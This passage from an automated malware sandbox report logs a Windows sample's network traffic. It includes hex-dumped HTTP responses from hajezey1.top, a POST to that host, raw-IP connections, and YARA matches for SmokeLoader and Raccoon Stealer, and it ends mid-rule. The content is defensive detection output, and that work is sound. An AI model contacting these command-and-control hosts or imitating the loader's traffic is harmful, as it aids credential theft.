65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 83 28 c8 53 57 5c 29 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 cc ec d2 ca 71 c4 7c be 0c c8 8c 31 f4 d1 98 44 68 38 4b 79 b3 fd ce d5 41 be 53 c9 5c a3 96 52 9b 1f d5 b8 e2 60 1b d6 d6 3d 1b cc c6 84 5b c2 67 7b 0d fc 45 a7 fd 00 72 6f 0e 3b 9a eb 96 06 d9 9a 3c ea d4 28 6a a3 4e 6e ad 0c 0f 59 cf 4c 15 6a c1 a8 a4 02 cb 50 7b 09 6a 86 79 d7 95 e7 05 f5 e1 94 52 e8 59 9b c5 a7 86 38 b4 f2 a7 7c 2b f0 3a cb 8f 8c f5 cf 9b 3b 66 9b 16 b8 eb 1b e5 d7 4a 74 d0 eb d8 07 cd 23 90 78 51 71 a2 8f d2 ee cf 1c e0 02 02 50 08 08 d8 e2 20 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 94 d5 d6 cb 0f 3d 61 19 f7 cb d2 b3 01 92 b4 b9 c1 82 20 59 57 11 5c 7c a3 7b ab ab 09 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 15 67 aa cf 30 c0 7a 9f 06 a2 7f c1 96 98 8b 36 19 19 cb 8a 13 d8 06 0e 45 87 13 7d 6f fd e0 04 89 f9 d4 57 80 90 70 89 f4 25 75 6b de f2 a2 22 48 32 d2 49 ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 75 01 35 07 1e fe 63 4b 83 8b 14 ca c3 f3 b2 ec 92 c0 15 1c 57 ec 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 7e 70 9f 6a a8 a5 17 08 e8 e1 98 ab e1 5f 11 87 4a 71 87 56 b0 50 f6 0a bf d9 6b 91 e0 55 d0 66 21 df 76 79 27 24 58 96 3a 39 d1 da 03 d4 30 74 61 27 47 c2 e6 5e 89 b2 e2 9b 52 ec c0 76 a7 e2 f0 b5 c3 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 78 2d 7f d4 2c d6 e8 b1 14 73 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 36 41 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e 8e ea 4c 76 7b de e2 46 f0 2e 56 bb 43 3e 8f 17 94 6b 36 a4 29 ec 90 bc 10 c9 2a 7c bd 67 c1 aa d7 b0 5d 28 ed fe 7b 9c 4d 16 94 18 42 26 2e 92 cc 1e fe 18 aa 34 a6 6d 96 8e a4 42 1f 01 31 fd ce 0f 88 f4 0e 37 c4 fe 87 75 87 f0 d3 4b 1d 53 58 1d a5 05 80 e0 2d f0 0e 55 f6 1f 5f a1 67 50 41 48 ab 0b 52 ea 5a 15 6c de 30 ea 2e ad 46 6a de 5e f7 44 18 bd 95 59 f8 d2 3e b8 77 24 7e 65 b9 0a f1 91 cf f3 bc 34 bc 36 b3 ec d3 70 01 21 f4 5c 58 2b 72 12 c9 8e 70 ac e4 26 be 99 04 33 2b 22 f5 2d 09 7d a2 d1 92 4b de 94 cf 91 7b 41 0a f6 29 8f 4d aa d1 b9 ba 97 30 d0 47 43 05 f2 42 e6 56 91 24 c8 00 66 b4 ea f1 ea 7f ae 1a a5 f4 ea 4c 90 54 77 8b ee 2b 0b 67 45 12 c3 3e ba 2d 09 86 99 57 f9 68 8d 90 26 d3 d6 c0 c8 30 6f 41 cb 1b b9 71 ca 6d 88 44 13 51 13 66 7d 6c 65 04 f5 7f f6 50 99 85 84 90 c1 2f d1 0c 6a c3 1b 95 50 49 25 3f d2 3e 20 12 1e b7 6b 6c cc bd 41 2b 1b 23 28 21 ae 60 78 2f 46 5e 1e b2 57 d9 bd be 2f 83 ef d9 a7 8f 83 f1 60 4c 72 fe 24 f4 89 6f e4 f7 81 c4 ff 58 4f dd d7 ef 3d 08 bb 78 fd 16 f7 c9 66 bd 2b da df 97 5f 29 86 97 72 20 bd 29 71 96 25 a6 46 bd 59 f8 b6 06 d7 55 02 a0 48 79 68 42 65 09 90 ed ff 21 ab c0 00 75 94 f2 cb 54 26 12 ad 67 61 8a ec 1c dc ce 76 60 4c 00 c8 98 ff e0 2b 03 c6 c0 fb 71 7b 01 00 a5 20 e0 e2 cc 93 4f fd 40 9c 81 b9 f3
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                        Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                        Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                        Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                        Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                        Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                        Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                        Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xauocndh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
                        Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49808 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        barindex
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                        Source: cnv622JnZv.exe, 00000000.00000002.258287282.0000000002EAA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        E-Banking Fraud:

                        barindex
                        Yara detected Raccoon StealerShow sources
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR

                        System Summary:

                        barindex
                        .NET source code contains very large array initializationsShow sources
                        Source: 977B.exe.6.dr, ??????????????/_?????xptkvqfesn.csLarge array initialization: _?????nacpgkwmie: array initializer size 208904
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49AB40
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B493360
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A309
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AABD8
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4C8BE8
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5223E3
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B51EB8A
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AEBB0
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B52FA2B
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B53E2C5
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534AEF
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5432A9
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B494120
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B492990
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4999BF
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A8840
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B476800
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B531002
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B49A830
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B48B090
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A2F70
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B5367E2
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4FAE60
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B496E30
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B542EF7
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B541D55
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B492D50
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B470D20
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A35D0
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B492430
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B534496
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B47EC9B
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00425150
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_0042419D
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_0041FAF0
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00403340
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00414437
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00422E27
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00422F47
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_0041FF88
                        Source: 8615.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 8615.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 8615.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 8615.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 8615.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 8615.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 8615.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 2E26.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: bejhieg.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: bejhieg.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: bejhieg.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: bejhieg.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: bejhieg.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: bejhieg.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: bejhieg.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: AdvancedRun.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: AdvancedRun.exe.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                        Source: cnv622JnZv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: 29.0.A557.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
